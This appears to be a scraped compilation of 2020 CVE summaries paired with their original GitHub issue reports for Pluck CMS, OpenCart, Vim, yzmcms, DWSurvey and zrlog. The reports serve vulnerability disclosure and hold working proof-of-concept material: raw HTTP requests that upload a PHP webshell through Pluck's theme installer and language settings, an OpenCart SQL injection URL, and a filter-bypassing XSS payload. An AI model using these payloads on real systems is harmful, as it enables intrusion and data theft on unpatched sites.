File upload vulnerability in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary code and access sensitive information via the theme.php file.

pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme  
Demo:  
After the installation is successful, go to the management background.  
  
options->choose theme->install theme  
  

vul-url：  
http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall  
According to the default template, the theme is faked with the content of the theme shell.php.zip as follows:  
  
Insert phpinfo(); in the theme.php file;  

upload

    POST /pluck-4.7.10-dev3/admin.php?action=themeinstall HTTP/1.1
    Host: 192.168.80.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.80.1/pluck-4.7.10-dev3/admin.php?action=themeinstall
    Cookie: PHPSESSID=en364hjlvg84vpdvmv9gdlc0h2
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=---------------------------10771789627341
    Content-Length: 2441
    
    -----------------------------10771789627341
    Content-Disposition: form-data; name="sendfile"; filename="shell.php.zip"
    Content-Type: application/x-zip-compressed
    
    PK���     楽VO            
       shell.php/PK���   � 漇VO?K�?   ��  �   shell.php/info.phpe幧
    ?�嗭吘肞<j呼?鐴D$$?殟,趱M*侾標7薬p抡U譣??
    �?0?z?�N%???
    ?.?魫G_�?D尞锖i氌`祂?&犇 梿}? ?顪m?c]照j>胜?4A燫m??�桯[?>?�镗G�4慺蓈3阒F魠�?PK���   � 嫇OO蘺貔{�  ?  �   shell.php/style.css誚M彌0�=o~叆≧籞睝毻*?鞧玘zj?�喐k02&洿??�唋音凿惸虥?笃N溃=??p鴾�^f?r婆
    M?险{=箞y&?鞼鑷 A�n圖呔贸&丨^皭b懶l呠|窞糔&x舎?�m桡镛C?;镈$?K?�霥@8[ZPIⅢ?攖K蚊n鴸?簟z�囄R挄h扮?煦tt斤?杞煆驱3:?郚拃伹NMQ2厡h?檢n垭"荙D长?�?歭?y嬟〕
    罸璤h$7+碶ㄤ脩0U蘺A祎A�啀狤Fb群p?&戒虠?]_"鐌舚?@椬-?u?笖<�y 挛銫頥ク�6Do莀茇猰?緂??靷?Jw咁n栽讘<�?Es貦汛竻�覦嬄颖�k墐偝瞆| �!紂[垄ZN?刅}恶郎溃+=pGU菥|/梿倩?�??MS紮O业Z, 嵻3葥駥 ^蕚Fa??\@泴�?傗?氶﹚�x桷挩?钨(亵袪昀�鯫2?�?蛸�_江陰踴灶歳鐼_鳜og蹪~顳衜碬�K瞍m覐]@-锾?鐠�游J璋梀伶c�;h选To1p?+?0V蠁﹊"鹁襆臣琄b铧;A1籅_	?IC|??NA�?&�fわ?�姚.潥4�鉵5u尕o蝜?,�?ぢ?蟲?黋 _炧膿胬7?�偶睊�>I*�盡{;Dk�嘜乤遥墽Y摊写縛?駗囐Y昝d脂鷺b闔h|�?蕠瓞F/?霭澅琽瞀盡�k睬辵4_簝I鸜�捚?�O�N扇惋帖�?闂鷍	8?$=睋
    瀭?T窰1[�m觊D))
    ?还^gT�€�郪�3
    蚾€i擣 服h爓,(英?_!婀i線郯*GO�.%W抝�c摫胎?B痤lAⅤ萿酊�PK���   � 筍VO鱪鷸?  ?  �   shell.php/theme.php}S羘贎�=�?橒睩*?9�?�寓:�%FmOh?鉛斓e痗慂褫怠敀驸�蠜麈i<�M?�J�?BY��*F圖?JI�?牟D�\��猟飔;�#!戂d避豸+锳V 顒采}C 嶳 ???BF欇�v;�ot=?
    ~�?佌鷵繕傉斠Y0?_?�\?<〣剨淫?+V*浚串kЬu瞓K僄?*�襼賞�鍀;?Md9~C?�-?Mw	撣闭n�?�~鵼��B苪l`敞�7)*f聻?�=6=g|o"�?
    3轠aぎMv5奭PB%h,渇擝aS秢瓡w@=適次M适&UB> I剏睵塛詸kX??欎?Ju磛髺禍m祐	灛輁X;i:.@V 矷F3?u\?笶蒊濧\`t鰨?羭硚鬗�M箔悗?忨T?e�鼈<锌馏���g鐢'U�右\曞5瘹鉙<^�5w琮�PK��? �     楽VO            
     $       �       shell.php/
           � � 柭萵€堈�梷Kt€堈�袘€]y堈�PK��? �   � 漇VO?K�?   ��  � $           (   shell.php/info.php
           � � �4=t€堈�u�7瘈堈�]�?|堈�PK��? �   � 嫇OO蘺貔{�  ?  � $           ��  shell.php/style.css
           � � €怷DC冋�)A7瘈堈��l洹|堈�PK��? �   � 筍VO鱪鷸?  ?  � $           ?  shell.php/theme.php
           � � 9晸€堈�yg7瘈堈�?察z堈�PK��    � � ?  ?    
    -----------------------------10771789627341
    Content-Disposition: form-data; name="submit"
    
    Upload
    -----------------------------10771789627341--
    
    

**1.default theme**

  
View site  

**2.choose shell.php theme**

  

View site http://192.168.80.1/pluck-4.7.10-dev3/  

phpinfo();Function is executed

_**The vulnerability exists in the latest pluck-4.7.10-dev2 pluck-4.7.10-dev3. The pluck-4.7.10-dev4 version cannot be uploaded due to bugs in the program, but in theory the RCE vulnerability exists. In pluck-4.7.10-dev4 version**_

CVE-2020-20919: pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme · Issue #85 · pluck-cms/pluck

File Upload vulnerability in PluckCMS v.4.7.10 allows a remote attacker to execute arbitrary code via the trashcan_restoreitem.php file.

Pluck-4.7.10 admin background exists a remote command execution vulnerability

it happens when restore file from trashcan,and the restoring file has the same with one of the files in uploaded files dir  
the coding flaw is in file /pluck/data/inc/trashcan\_restoreitem.php at line 54  
  
when $var1 is 'shell.php.txt', here $filename will get value 'shell' and $extension will get value 'php', and then concat with the string '\_copy' we will get the final filename with 'shell\_copy.php'

Proof  
step1: login -> pages -> manage files  
upload file with name shell.php.txt  
  
  
upload success  

step2: delete file to trashcan  

step3: upload the same file again  

step4: restore the file from trashcan, and the restored file is renamed as shell\_copy.php  
  

step5: visit webshell  

note: operate with "manage images" can do the same as it has the same coding flaw at line 76

CVE-2020-20969: Pluck-4.7.10 admin background exists a remote command execution vulnerability  · Issue #86 · pluck-cms/pluck

Cross Site Scripting vulnerability in zrlog zrlog v.2.1.3 allows a remote attacker to execute arbitrary code via the nickame parameter of the /post/addComment function.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-21052: 前台文章评论处存储型XSS · Issue #56 · 94fzb/zrlog

Buffer Overflow vulnerability in VIM v.8.1.2135 allows a remote attacker to execute arbitrary code via the operand parameter.

**VIM Version:**

    $ ./vim --version
    VIM - Vi IMproved 8.1 (2018 May 18, compiled Oct 10 2019 22:18:57)
    Included patches: 1-2133
    Compiled by input0@zero
    Huge version without GUI.  Features included (+) or not (-):
    +acl               -farsi             -mouse_sysmouse    -tag_any_white
    +arabic            +file_in_path      +mouse_urxvt       -tcl
    +autocmd           +find_in_path      +mouse_xterm       +termguicolors
    +autochdir         +float             +multi_byte        +terminal
    -autoservername    +folding           +multi_lang        +terminfo
    -balloon_eval      -footer            -mzscheme          +termresponse
    +balloon_eval_term +fork()            +netbeans_intg     +textobjects
    -browse            +gettext           +num64             +textprop
    ++builtin_terms    -hangul_input      +packages          +timers
    +byte_offset       +iconv             +path_extra        +title
    +channel           +insert_expand     -perl              -toolbar
    +cindent           +job               +persistent_undo   +user_commands
    +clientserver      +jumplist          +postscript        +vartabs
    +clipboard         +keymap            +printer           +vertsplit
    +cmdline_compl     +lambda            +profile           +virtualedit
    +cmdline_hist      +langmap           -python            +visual
    +cmdline_info      +libcall           -python3           +visualextra
    +comments          +linebreak         +quickfix          +viminfo
    +conceal           +lispindent        +reltime           +vreplace
    +cryptv            +listcmds          +rightleft         +wildignore
    +cscope            +localmap          -ruby              +wildmenu
    +cursorbind        -lua               +scrollbind        +windows
    +cursorshape       +menu              +signs             +writebackup
    +dialog_con        +mksession         +smartindent       +X11
    +diff              +modify_fname      -sound             +xfontset
    +digraphs          +mouse             +spell             -xim
    -dnd               -mouseshape        +startuptime       -xpm
    -ebcdic            +mouse_dec         +statusline        +xsmp_interact
    +emacs_tags        -mouse_gpm         -sun_workshop      +xterm_clipboard
    +eval              -mouse_jsbterm     +syntax            -xterm_save
    +ex_extra          +mouse_netterm     +tag_binary        
    +extra_search      +mouse_sgr         -tag_old_static    
       system vimrc file: "$VIM/vimrc"
         user vimrc file: "$HOME/.vimrc"
     2nd user vimrc file: "~/.vim/vimrc"
          user exrc file: "$HOME/.exrc"
           defaults file: "$VIMRUNTIME/defaults.vim"
      fall-back for $VIM: "/usr/local/share/vim"
    Compilation: afl-clang-fast -c -I. -Iproto -DHAVE_CONFIG_H     -g -O2 -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=1       
    Linking: afl-clang-fast   -L/usr/local/lib -Wl,--as-needed -o vim    -lSM -lICE -lXpm -lXt -lX11 -lXdmcp -lSM -lICE  -lm -ltinfo -lelf -lnsl  -ldl           
    

**MData:**

    While fuzzing VIM with enabling different mode an use-after-free was observed. This is 
    likely  a write access violation, which means the attacker may have control over the 
    write address and value.  
    

**GDB BT:**

    (gdb) run -u NONE -X -Z -e -s -S out/id\:000001\,sig\:11\,src\:018487\,time\:45124324+017124\,op\:splice\,rep\:8 -c ':qa!'
    Starting program: /home/input0/nvim/vim/src/vim -u NONE -X -Z -e -s -S out/id\:000001\,sig\:11\,src\:018487\,time\:45124324+017124\,op\:splice\,rep\:8 -c ':qa!'
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    
    Program received signal SIGSEGV, Segmentation fault.
    0x000000000041adeb in bt_terminal (buf=0x7ffff6c3fca0 <main_arena+96>) at buffer.c:5307
    5307	    return buf != NULL && buf->b_p_bt[0] == 't';
    (gdb) bt 
    #0  0x000000000041adeb in bt_terminal (buf=0x7ffff6c3fca0 <main_arena+96>) at buffer.c:5307
    #1  0x00000000008ed15d in win_enter_ext (wp=<optimized out>, undo_sync=<optimized out>, curwin_invalid=0, 
        trigger_new_autocmds=<optimized out>, trigger_enter_autocmds=<optimized out>, trigger_leave_autocmds=<optimized out>) at window.c:4658
    #2  0x00000000008e8b02 in win_split_ins (size=<optimized out>, flags=<optimized out>, new_wp=<optimized out>, dir=<optimized out>)
        at window.c:1326
    #3  0x00000000008e0f1f in win_split (size=0, flags=0) at window.c:812
    #4  0x0000000000409e23 in do_argfile (eap=0x7fffffffa890, argn=0) at arglist.c:662
    #5  0x00000000005214bd in do_one_cmd (sourcing=<optimized out>, cstack=<optimized out>, cmdlinep=<optimized out>, fgetline=<optimized out>, 
        cookie=<optimized out>) at ex_docmd.c:2470
    #6  do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:966
    #7  0x00000000007a0b32 in do_source (fname=<optimized out>, check_other=<optimized out>, is_vimrc=<optimized out>) at scriptfile.c:1214
    #8  0x000000000079f5b9 in cmd_source (fname=0xc4f583 "out/id:000001,sig:11,src:018487,time:45124324+017124,op:splice,rep:8", 
        eap=<optimized out>) at scriptfile.c:805
    #9  0x00000000005214bd in do_one_cmd (sourcing=<optimized out>, cstack=<optimized out>, cmdlinep=<optimized out>, fgetline=<optimized out>, 
        cookie=<optimized out>) at ex_docmd.c:2470
    #10 do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:966
    #11 0x000000000096e6c9 in exe_commands (parmp=<optimized out>) at main.c:3133
    #12 vim_main2 () at main.c:795
    #13 0x000000000096b597 in main (argc=<optimized out>, argv=<optimized out>) at main.c:444
    (gdb) i r
    rax            0xfffffffffffffffc	-4
    rbx            0xc6dae0	13032160
    rcx            0x0	0
    rdx            0xc27900	12744960
    rsi            0x0	0
    rdi            0x7ffff6c3fca0	140737333427360
    rbp            0xc6dae8	0xc6dae8
    rsp            0x7fffffff96c8	0x7fffffff96c8
    r8             0x5f	95
    r9             0x1	1
    r10            0x7fffffff8c60	140737488325728
    r11            0x0	0
    r12            0x1	1
    r13            0x0	0
    r14            0xfffffffffffffffc	-4
    r15            0x1	1
    rip            0x41adeb	0x41adeb <bt_terminal+75>
    eflags         0x10206	[ PF IF RF ]
    cs             0x33	51
    ss             0x2b	43
    ds             0x0	0
    es             0x0	0
    fs             0x0	0
    gs             0x0	0
    (gdb) 
    

**ASAN BT:**

    ==14666==ERROR: AddressSanitizer: heap-use-after-free on address 0x62500000f108 at pc 0x000000db2301 bp 0x7ffcbdb68e70 sp 0x7ffcbdb68e68
    READ of size 8 at 0x62500000f108 thread T0
        #0 0xdb2300 in win_enter_ext /home/input0/vim/src/window.c:4658:25
        #1 0xda89af in win_split_ins /home/input0/vim/src/window.c:1326:5
        #2 0xd9b007 in win_split /home/input0/vim/src/window.c:812:12
        #3 0x516344 in do_argfile /home/input0/vim/src/arglist.c:662:10
        #4 0x7120d0 in do_one_cmd /home/input0/vim/src/ex_docmd.c:2470:2
        #5 0x7120d0 in do_cmdline /home/input0/vim/src/ex_docmd.c:966
        #6 0xb60432 in do_source /home/input0/vim/src/scriptfile.c:1214:5
        #7 0xb5e5bf in cmd_source /home/input0/vim/src/scriptfile.c:805:14
        #8 0x7120d0 in do_one_cmd /home/input0/vim/src/ex_docmd.c:2470:2
        #9 0x7120d0 in do_cmdline /home/input0/vim/src/ex_docmd.c:966
        #10 0xe9998f in exe_commands /home/input0/vim/src/main.c:3133:2
        #11 0xe9998f in vim_main2 /home/input0/vim/src/main.c:795
        #12 0xe94b2c in main /home/input0/vim/src/main.c:444:12
        #13 0x7f32b72bbb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
        #14 0x41ff49 in _start (/home/input0/vim/src/vim+0x41ff49)
    
    0x62500000f108 is located 8 bytes inside of 8664-byte region [0x62500000f100,0x6250000112d8)
    freed by thread T0 here:
        #0 0x4d53e8 in __interceptor_free.localalias.0 (/home/input0/vim/src/vim+0x4d53e8)
        #1 0x8f411e in vim_free /home/input0/vim/src/misc2.c:1802:2
        #2 0x5270ea in apply_autocmds /home/input0/vim/src/autocmd.c:1607:12
        #3 0xda89af in win_split_ins /home/input0/vim/src/window.c:1326:5
        #4 0xd9b007 in win_split /home/input0/vim/src/window.c:812:12
    
    previously allocated by thread T0 here:
        #0 0x4d55a0 in malloc (/home/input0/vim/src/vim+0x4d55a0)
        #1 0x8ef102 in lalloc /home/input0/vim/src/misc2.c:924:11
        #2 0xd9b007 in win_split /home/input0/vim/src/window.c:812:12
    
    SUMMARY: AddressSanitizer: heap-use-after-free /home/input0/vim/src/window.c:4658:25 in win_enter_ext
    Shadow bytes around the buggy address:
      0x0c4a7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c4a7fff9e20: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x0c4a7fff9e70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==14666==ABORTING
    

**To Reproduce:** vim -u NONE -X -Z -e -s -S $POC -c ':qa!'

CVE-2020-20703: UAF: Access violation near NULL on destination operand · Issue #5041 · vim/vim

Cross Site Request Forgery found in yzCMS v.2.0 allows a remote attacker to execute arbitrary code via the token check function.

Hello, I found a vulnerability in your application. I call it a denial of service attack caused by CSRF. The point of vulnerability is the URL rule configuration. When I use CSRF to configure an illegal rule for administrators, the access routing of the whole station will be changed. That is to say, it is totally inaccessible and the site is in 404 status. (Its priority is higher than the original admin/et al route).

Attacks are shown as follows:

No token check is used at the setup route.  
  
the poc is:

When the POC is executed, all routes of the site http://host/aaaaaa are directed to http://host/hack\_by\_laker

And we can define multiple routes in a link, so that all routes are customized and the whole station will crash so that it cannot be accessed.  
  
  
  

In Chinese：  
您好，我在您的应用程序上发现了一个漏洞，我称它为CSRF造成的拒绝服务攻击。漏洞的产生点在URL规则配置，当我利用CSRF让管理员配置一个不合法的规则，整个站的访问路由都将被改变。也就是完全无法访问，站点全部呈现404状态。（其优先级高于原本的admin/等路由）。  
攻击展示如下：  
  
the poc is:

在设置路由处未使用token校验，

并且我们可以在一个链接中定义多个路由，这样，所有的路由全部被自定义，整站将崩溃以致于无法访问：

CVE-2020-20502: Denial of service attack caused by CSRF(CSRF造成的拒绝服务攻击) · Issue #27 · yzmcms/yzmcms

SQL injection vulnerability found in Joyplus-cms v.1.6.0 allows a remote attacker to access sensitive information via the id parameter of the goodbad() function.

CVE-2020-20636

File Upload vulnerability in PluckCMS v.4.7.10 dev versions allows a remote attacker to execute arbitrary code via a crafted image file to the the save_file() parameter.

admin.php:

language.php：

save\_file():

"../../../images/wphp.jpg" Be written to \\data\\settings\\langpref.php

Users can upload a picture file containing malicious code to getshell.

POST /pluck-4.7.10-dev1/admin.php?action=language HTTP/1.1  
Host: 127.0.0.1:83  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:83/pluck-4.7.10-dev1/admin.php?action=language  
Cookie: LQUKaS\_admin\_username=admin; Hm\_lvt\_f6f37dc3416ca514857b78d0b158037e=1570503836; PHPSESSID=a0bhen6shpeifgc20p0l23pmj1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 70

cont1=../../../images/php.jpg&save=%E5%82%A8%E5%AD%98&cmd=echo "2333";

CVE-2020-20718: File contains vuln pluck 4.7.10 dev version · Issue #79 · pluck-cms/pluck

SQL injection vulnerability in OpenCart v.2.2.00 thru 3.0.3.2 allows a remote attacker to execute arbitrary code via the Fba plugin function in upload/admin/index.php.

**What version of OpenCart are you reporting this for?**  
2.2.0.0 ~ 3.0.3.2

**Describe the bug**  
A SQL injection caused by inappropriate user input filtering.

**What section does it affect?**  
openbay-fba extension

**To Reproduce**  
Steps to reproduce the behavior:

1.  Log in as administrator
2.  Install "OpenBay Pro" extension
3.  Enable "Fulfillment by Amazon"(Fba) plugin
4.  Visit upload/admin/index.php?route=extension/openbay/fba/orderList&user\_token=your\_token&filter\_start=1%27%20and%20updatexml(1,concat(0x7e,(select%20user()),1),0x7e)--%20  
    (ps: Replace the user\_token parameter with your own.)

**Expected behavior**  
'select user()' will be executed and its result will be returned

CVE-2020-20491: SQL Injection vulnerability found in fba extension · Issue #7612 · opencart/opencart

Cross Site Scripting vulnerability found in wkeyuan DWSurvey 1.0 allows a remote attacker to execute arbitrary code via thequltemld parameter of the qu-multi-fillblank!answers.action file.

There is a Reflective XSS vulnerability when user view the survey result. The failure of the XSS filter to work properly resulted in this vulnerability， which allows remote attackers to inject arbitrary web script or stole admin's or other users cookies. The impact of the problem is serious especially when combined with CSRF vulnerability exploitation.

Vulnerability file:  
/diaowen/design/qu-multi-fillblank!answers.action

PoC:  
/diaowen/design/qu-multi-fillblank!answers.action?quItemId=2c9790db6c74f25f016c7536aed90022&surveyId=2c9790db6c74f25f016c7"><scr<script>ipt>alert('XSS');</script 200

CVE-2020-20070: [security vulnerability]  Reflective XSS when view the survey result · Issue #48 · wkeyuan/DWSurvey

Cross Site Scripting vulnerability in Typora v.0.9.79 allows a remote attacker to execute arbitrary code via the mermaid sytax.

Source

CVE